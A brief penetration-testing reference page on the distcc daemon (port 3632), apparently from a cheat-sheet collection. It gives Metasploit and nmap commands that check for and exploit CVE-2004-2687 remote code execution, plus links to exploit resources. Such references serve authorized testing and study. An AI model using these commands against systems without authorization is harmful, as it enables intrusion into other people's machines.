# 3632 - Pentesting distcc ## Basic Information Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed **Default port:** 3632 ```text PORT STATE SERVICE 3632/tcp open distccd ``` ## Exploitation Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code: ```bash msf5 > use exploit/unix/misc/distcc_exec nmap -p 3632 --script distcc-exec --script-args="distcc-exec.cmd='id'" ``` ## Shodan _I don't think shodan detects this service._ ## Resources * [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec) * [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855) Post created by **Álex B \(@r1p\)**